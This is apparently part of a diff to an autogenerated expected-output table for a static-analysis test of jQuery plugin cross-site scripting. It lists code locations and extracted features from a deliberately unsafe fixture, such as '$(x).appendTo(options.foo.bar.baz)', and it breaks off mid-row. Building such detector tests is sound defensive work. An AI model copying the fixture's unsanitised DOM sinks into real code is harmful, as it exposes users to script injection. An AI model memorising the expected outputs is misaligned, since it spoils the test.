| +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:19:78:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:28:76:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:28:76:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:28:76:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:28:76:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:76:38:76:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | $(x) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | $(x) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | $(x) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | $(x) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | exceptional return of $(x) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | exceptional return of $(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | exceptional return of $(x) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:6 | exceptional return of $(x) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:15 | $(x).appendTo | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:15 | $(x).appendTo | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:15 | $(x).appendTo | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:15 | $(x).appendTo | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | $(x).ap ... ar.baz) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | $(x).ap ... ar.baz) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | $(x).ap ... ar.baz) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | $(x).ap ... ar.baz) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | exceptional return of $(x).ap ... ar.baz) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | exceptional return of $(x).ap ... ar.baz) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | exceptional return of $(x).ap ... ar.baz) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:3:77:36 | exceptional return of $(x).ap ... ar.baz) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:5:77:5 | x | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:5:77:5 | x | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:5:77:5 | x | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:5:77:5 | x | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:5:77:5 | x | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:5:77:5 | x | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:8:77:15 | appendTo | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:8:77:15 | appendTo | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:8:77:15 | appendTo | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:8:77:15 | appendTo | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:23 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:23 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:23 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:23 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:27 | options.foo | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:27 | options.foo | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:27 | options.foo | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:27 | options.foo | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:31 | options.foo.bar | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:31 | options.foo.bar | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:31 | options.foo.bar | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:31 | options.foo.bar | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:25:77:27 | foo | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:25:77:27 | foo | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:25:77:27 | foo | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:25:77:27 | foo | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:29:77:31 | bar | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:29:77:31 | bar | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:29:77:31 | bar | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:29:77:31 | bar | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:33:77:35 | baz | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:33:77:35 | baz | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:33:77:35 | baz | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:77:33:77:35 | baz | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:80:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:82:2 | $.fn.my ... / OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:82:2 | $.fn.my ... / OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:82:2 | $.fn.my ... / OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:2:82:2 | $.fn.my ... / OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:4:80:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:4:80:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:4:80:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:4:80:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:7:80:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:7:80:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:7:80:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:7:80:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:80:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:80:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:80:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:80:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | functio ... / OK\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | functio ... / OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 